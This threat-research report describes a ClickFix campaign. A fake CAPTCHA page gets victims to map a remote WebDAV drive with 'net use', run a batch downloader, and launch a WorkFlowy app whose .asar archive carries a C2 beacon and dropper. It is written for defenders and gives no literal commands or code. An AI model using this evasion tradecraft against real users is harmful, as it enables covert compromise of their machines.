Atos Threat Research Center has identified a novel variant of the ClickFix social engineering technique, marking a significant evolution in this persistent threat. The core deception remains unchanged: attackers lure victims to a fraudulent webpage, often disguised as a CAPTCHA verification system, which instructs them to manually execute a malicious command using the Windows Run dialog (Win+R). However, this latest iteration introduces a refined execution chain designed for enhanced stealth and evasion. Instead of relying on more commonly monitored vectors like PowerShell or `mshta.exe`, the attackers now utilize the `net use` command to map a network drive from a remote, attacker-controlled server. The user is tricked into pasting and running a command that first maps a WebDAV share as a local drive (e.g., Z:), then executes a batch script (`update.cmd`) from that drive, and finally deletes the drive mapping to cover its tracks. This method of leveraging legitimate administrative tools for initial access represents a tactical shift to bypass security controls that may be focused on scripting engines.
The infection chain proceeds with sophisticated precision. The executed `update.cmd` batch file acts as a downloader, fetching a ZIP archive from the internet. Once extracted, the payload reveals a clever form of application hijacking. The attackers target the legitimate WorkFlowy note-taking application, but they modify its core application logic by injecting malicious code into the app's `.asar` archive file. This archive format, commonly used in Electron-based applications like WorkFlowy, packages the application's source code. By tampering with it, the malware ensures that when the user launches the seemingly genuine WorkFlowy app, it executes the hidden malicious code first. This technique, known as "living-off-the-land" or binary tampering, provides excellent camouflage, as the process appears to be a trusted, signed application.
The malicious code embedded within the WorkFlowy application serves a dual function. Primarily, it acts as a persistent Command and Control (C2) beacon, establishing communication with the attackers' infrastructure to receive further instructions. Secondly, it operates as a dropper, responsible for retrieving and deploying the final-stage malware payload onto the compromised system. The specific nature of this final payload—whether it is a remote access trojan (RAT), information stealer, or ransomware—can vary based on the attackers' objectives. The use of a multi-stage process, combined with the abuse of a legitimate software package, significantly complicates detection for traditional antivirus and endpoint protection solutions that may not deeply inspect modified Electron application archives.
This campaign, hosted on the domain "happyglamper[.]ro", underscores a concerning trend in the cyber threat landscape: the continuous refinement of social engineering lures paired with increasingly opaque technical execution methods. While the `net use` command and batch scripts are not new tools, their specific combination in the ClickFix context is a novel Tactics, Techniques, and Procedures (TTP) shift. It highlights adversaries' adaptability in circumventing defensive measures that have grown wise to previous iterations. For cybersecurity professionals, this reinforces the need for defense-in-depth strategies that include robust user awareness training against such "manual" execution social engineering, advanced endpoint detection capable of monitoring for anomalous process behavior from trusted applications, and network-level controls to block connections to suspicious external WebDAV servers and unknown domains.
